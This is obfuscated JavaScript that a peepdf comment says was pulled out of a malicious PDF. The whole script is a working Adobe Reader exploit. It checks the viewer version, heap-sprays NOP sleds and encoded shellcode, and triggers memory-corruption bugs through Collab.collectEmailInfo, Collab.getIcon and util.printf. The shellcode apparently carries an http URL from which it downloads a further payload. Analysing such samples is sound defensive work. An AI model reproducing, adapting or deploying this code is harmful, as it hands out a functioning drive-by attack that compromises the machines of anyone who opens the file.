// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u', '4343%u', '0FEB%', 'u335B%u6', '6C9%u8', '0B9%u', '8001%uEF', '33%uE2', '43%uEBFA', '%uE805%', 'uFFEC%u', 'FFFF%', 'u8B7F', '%uDF4', 'E%uEFEF%', 'u64EF%u', 'E3AF%u9', 'F64%u42', 'F3%u9F6', '4%u6EE', '7%uEF03%', 'uEFEB%', 'u64EF%u', 'B903%', 'u6187%u', 'E1A1%u07', '03%uEF1', '1%uEFEF%', 'uAA66', '%uB9EB%', 'u7787%u6', '511%u0', '7E1%uE', 'F1F%uE', 'FEF%uAA', '66%uB9E7', '%uCA8', '7%u105F%', 'u072D%uE', 'F0D%uEFE', 'F%uAA66', '%uB9E', '3%u008', '7%u0F21', '%u078F%', 'uEF3B', '%uEFE', 'F%uAA66', '%uB9F', 'F%u2E87', '%u0A96%', 'u0757%u', 'EF29%', 'uEFEF', '%uAA66%u', 'AFFB%', 'uD76F', '%u9A2C%', 'u6615%u', 'F7AA%uE', '806%uEF', 'EE%uB', '1EF%u9A6', '6%u64C', 'B%uEBA', 'A%uEE85', '%u64B', '6%uF7BA', '%u07B9%', 'uEF64%', 'uEFEF%u', '87BF%uF', '5D9%u9F', 'C0%u78', '07%uEF', 'EF%u66EF', '%uF3A', 'A%u2A64%', 'u2F6C%u', '66BF%u', 'CFAA%u', '1087%uE', 'FEF%uBF', 'EF%uAA64', '%u85FB', '%uB6ED', '%uBA64%', 'u07F7', '%uEF8E', '%uEFEF%u', 'AAEC%', 'u28CF%u', 'B3EF%', 'uC191%', 'u288A%u', 'EBAF%u', '8A97%uEF', 'EF%u9A', '10%u6', '4CF%uE3', 'AA%uEE8', '5%u64B', '6%uF7BA%', 'uAF07%u', 'EFEF%u', '85EF%uB7', 'E8%uAAE', 'C%uDC', 'CB%uB', 'C34%u', '10BC%u', 'CF9A%uBC', 'BF%uA', 'A64%u8', '5F3%uB', '6EA%uBA', '64%u07', 'F7%uEF', 'CC%uEFE', 'F%uEF8', '5%u9A10%', 'u64CF%u', 'E7AA%u', 'ED85%u6', '4B6%uF', '7BA%u', 'FF07%', 'uEFEF%u', '85EF%u', '6410%', 'uFFAA%uE', 'E85%u64', 'B6%uF7BA', '%uEF07', '%uEFEF', '%uAEEF%', 'uBDB4%', 'u0EEC', '%u0EEC', '%u0EEC', '%u0EE', 'C%u036', 'C%uB5EB', '%u64BC', '%u0D35%u', 'BD18%u', '0F10%', 'u64BA%u6', '403%uE', '792%u', 'B264%u', 'B9E3%u9C', '64%u6', '4D3%uF19', 'B%uEC97', '%uB91', 'C%u99', '64%uEC', 'CF%uDC1C', '%uA62', '6%u42', 'AE%u2CEC', '%uDCB9%', 'uE019%', 'uFF51%', 'u1DD5%', 'uE79B%', 'u212E%', 'uECE2%uA', 'F1D%u1', 'E04%u1', '1D4%u9A', 'B1%uB', '50A%u0', '464%uB56', '4%uECCB', '%u8932', '%uE36', '4%u64A', '4%uF3B', '5%u32EC%', 'uEB64%u', 'EC64%uB', '12A%u2D', 'B2%uEF', 'E7%u1', 'B07%u10', '11%uBA', '10%uA3', 'BD%uA0', 'A2%uEFA1', '%u7468', '%u707', '4%u2F', '3A%u77', '2F%u72', '6F%u646', 'C%u697', '7%u6564%', 'u752D%', 'u6173%u6', '32E%u6D', '6F%u77', '2F%u6265', '%u6C61%u', '7A69%', 'u7265%u6', 'C2F%u6E', '61%u6964', '%u676E%u', '652F%u65', '78%u70', '2E%u706', '8%u783F', '%u703D%u', '6664');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

